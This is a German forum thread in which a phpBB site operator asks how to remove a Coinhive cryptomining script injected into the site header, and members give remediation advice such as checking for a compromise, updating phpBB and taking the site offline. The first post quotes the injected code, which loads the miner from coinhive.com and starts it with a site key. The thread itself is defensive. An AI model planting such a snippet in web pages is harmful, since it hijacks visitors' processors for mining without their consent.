Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 15 von 17

Thema: coinhive aus Scrypt entfernen?

  1. #1
    Senior Avatar von Der Buchhalter
    Registriert
    Sep 2016
    Beiträge
    237
    Gefällt mir!
    5
    Du gefällst: 33

    coinhive aus Scrypt entfernen?

    Hallo,
    Das ist JavaScript, dass in meiner Seite eingebettet ist und Crypto Berechnungen durchführt:
    Im Header findet man das hier


    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    ...
    <script>
    var miner = new CoinHive.Anonymous('MfNBKJ6B6qXQmqS3MR96UGW23a31jl 2V');
    miner.start();
    </script>

    Habe von meheren Usern die Nachricht bekommen das sie Auf meiner Webseite immer 100% CPU haben.
    Liegt es an dem Eintrag wenn ja was ist das für ein Scrypt und wo finde ich das und wie Enferne ich es?

    Gruß
    Buchhalter

  2. #2
    Senior Avatar von Nimbus
    Registriert
    Oct 2015
    Beiträge
    587
    Gefällt mir!
    110
    Du gefällst: 605
    Wir kennen deine Homepage bzw. dein Skript nicht. Folglich haben wir also noch weniger Ahnung als du davon. Ein paar Hintergrundinfos wären schon praktisch. Ansonsten kannst du die Datenbank und die Files mal nach "coinhive" durchsuchen. Das liefert eventuell Informationen über die Position. Ganz davon abgesehen musst du dir Gedanken machen, wie es da hin kommt...

  3. #3
    Senior
    THEMENSTARTER

    Avatar von Der Buchhalter
    Registriert
    Sep 2016
    Beiträge
    237
    Gefällt mir!
    5
    Du gefällst: 33
    Zu finden ist es im Quelltext

  4. #4
    Junior
    Registriert
    Jul 2016
    Beiträge
    127
    Gefällt mir!
    23
    Du gefällst: 72
    Mensch Nimbus "Im Quelltext!!" Wo sonst?!?

  5. #5
    Senior Avatar von Nimbus
    Registriert
    Oct 2015
    Beiträge
    587
    Gefällt mir!
    110
    Du gefällst: 605
    Gemeint war was für ein Script du nutzt bzw. wo das Coin-Hive-Script genau eingebunden wird (Header, Footer, Signatur eines Users, ...).
    Die anderen Hinweise gelten natürlich nach wie vor...

  6. #6
    VIP Team Avatar von noid
    Registriert
    Sep 2016
    Beiträge
    408
    Gefällt mir!
    1,129
    Du gefällst: 584
    Die primäre Frage ist ja, wie das Script da hin gekommen ist. Durch Magie wohl kaum. Was dann natürlich die Frage aufwirft, wer es eingebunden hat. Sollte es jemandem gelungen sein, sich unberechtigt Zugriff zu verschaffen, solltest du ggf die Sicherheit deiner Seite mal überprüfen. Die Entfernung hängt dann auch vom Aufbau der Seite ab.
    "Man sollte nicht immer Entschuldigung für das verletzende Verhalten anderer Menschen finden. Man kann auch keine Blume in ein Arschloch stecken und es Vase nennen."

  7. #7
    VIP Team Avatar von RedDevil
    Registriert
    Jan 2016
    Beiträge
    1,721
    Gefällt mir!
    1,157
    Du gefällst: 1,200
    Wen du das Script nicht eingebaut hast, wer hat den sonst noch Zugriff auf dein Panel ? Entweder du wurdest Hacked oder ein coAdmin / Mod ect hat es eingebaut. Sollte das jemand aus deinem Team gewesen sein, solltest du ganz schnell Aufräumen.

    < Error establishing a database connection >


  8. #8
    Senior
    THEMENSTARTER

    Avatar von Der Buchhalter
    Registriert
    Sep 2016
    Beiträge
    237
    Gefällt mir!
    5
    Du gefällst: 33
    Bin jetzt nicht der große Techniker darum freut man sich immer besonders auf so nette Helfer wie katze die braucht man.

    Mir hat es ein Member geschickt, demnach im Header

    Hallo,
    Das ist JavaScript, dass in meiner Seite eingebettet ist und Crypto Berechnungen durchführt:
    Im Header findet man das hier

    Ich nutze phpBB 3

    LG

  9. #9
    100% 0-Ahnung Avatar von FLX
    Registriert
    Mar 2015
    Beiträge
    1,669
    Gefällt mir!
    965
    Du gefällst: 1,247
    Okay, nur mal zur Klarstellung. Hast du das selber in den phpBB eingefügt ODER hast du keine Ahnung wie das da hinkommt und deine Mitglieder haben dich erst darauf aufmerksam gemacht?

    Schick mir mal per PN den Link zu deiner Seite.
    You are offline
    Try:
    • Don't Panic
    • Look around
    • Interact with reality

  10. #10
    VIP Team Avatar von manitos
    Registriert
    Jun 2016
    Beiträge
    202
    Gefällt mir!
    81
    Du gefällst: 193
    Da verdient jemand Geld über deine Webseite mit Coinhive (einem Coin-Miner) und hat einen Schad-Code (wird von manchen Anti-Viren-Programmen als sollcher erkannt) in das Script deiner Seite eingebunden.
    Du solltest dir entweder Leute suchen die sich mit sowas auskennen (Coder) oder es bitte bleiben lassen Webseiten zu betreiben und deine User in Gefahr zu bringen.

    Greetz
    manitos
    Geändert von manitos (27.11.2017 um 17:19 Uhr)

  11. #11
    Senior
    THEMENSTARTER

    Avatar von Der Buchhalter
    Registriert
    Sep 2016
    Beiträge
    237
    Gefällt mir!
    5
    Du gefällst: 33
    Ich habe keine Ahnung wie das dahingekommen ist, es ist einem Member aufgefallen weil seine CPU oft auf 100% lief
    Ich habe Kaspersky Internet Security 2018 aber hat nicht erkannt.
    Habe mir im Browser Antiminer und Coin Miner Block for Chrome installiert und auf meiner Seite sofort bereitgestellt.

  12. #12
    VIP Team Avatar von RedDevil
    Registriert
    Jan 2016
    Beiträge
    1,721
    Gefällt mir!
    1,157
    Du gefällst: 1,200
    Trotzdem erklärt es noch nicht, wie es dahin gekommen ist. Wen du es definitive nicht warst und auch keiner aus deinem Team, bist du Hacked worden. Dann am besten Seite Offline nehmen und mal jemanden schauen lassen der sich damit auch auskennt !

    Beste Regards

    < Error establishing a database connection >


  13. #13
    100% 0-Ahnung Avatar von FLX
    Registriert
    Mar 2015
    Beiträge
    1,669
    Gefällt mir!
    965
    Du gefällst: 1,247
    Hab ihn für später zum Gespräch eingeladen. Mal schauen was sich ergibt
    You are offline
    Try:
    • Don't Panic
    • Look around
    • Interact with reality

  14. #14
    VIP Team Avatar von RedDevil
    Registriert
    Jan 2016
    Beiträge
    1,721
    Gefällt mir!
    1,157
    Du gefällst: 1,200
    @Flexi: Dann bin ich mal gespannt, was dabei raus kommt. Mein Tipp ist trotzdem, die Seite erst mal Off zu nehmen.

    < Error establishing a database connection >


  15. #15
    Top-Secret-VIP
    Registriert
    Mar 2015
    Beiträge
    218
    Gefällt mir!
    110
    Du gefällst: 190
    Du hast die Zeilen doch schon gepostet, welche du entfernen musst..
    Vor allem solltest du dich mal umschauen und umhören wer es eingebunden haben könnte.
    Notfalls phpBB mal updaten und versuchen Lücken zu schließen, denn wenn du es nicht warst und es keiner aus deinem Team war kann es nur jemand fremdes gewesen sein, welches sich Zugriff verschafft hat. Entweder durch einer Lücke in eines deiner Scripts oder durch's infizieren und beklauen eines deiner Teamler.
    Be my friend: 1CeLvMCYZM5YKZvEPYDU2qG3fGF25jqgan

    504 Gateway Time-out

Seite 1 von 2 12 LetzteLetzte

Ähnliche Themen

  1. Coinhive Alternative
    Von Marvinkas im Forum Geld verdienen mit Traffic
    Antworten: 1
    Letzter Beitrag: 12.10.2021, 15:24
  2. Virenscanner/Firewall Meldung wegen coinhive Captcha!?
    Von G_P im Forum Filecrypt.cc - Anregung & Kritik
    Antworten: 4
    Letzter Beitrag: 11.12.2017, 11:10
  3. Massive beschwerden wegen Coinhive
    Von schneewittchen im Forum Filecrypt.cc - Anregung & Kritik
    Antworten: 4
    Letzter Beitrag: 25.11.2017, 08:53
  4. Coinhive-Captcha - bald auch bei Euch?
    Von Cannonau im Forum Filecrypt.cc - Anregung & Kritik
    Antworten: 27
    Letzter Beitrag: 22.11.2017, 18:22
  5. Wieso Coinhive Private Key?
    Von FLX im Forum Filecrypt.cc - Anregung & Kritik
    Antworten: 9
    Letzter Beitrag: 22.11.2017, 15:14

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
SzeneBox.org... im Mittelpunkt der Szene!
© since 2015 szeneBOX.org - All Rights Reserved
Domains: www.szenebox.org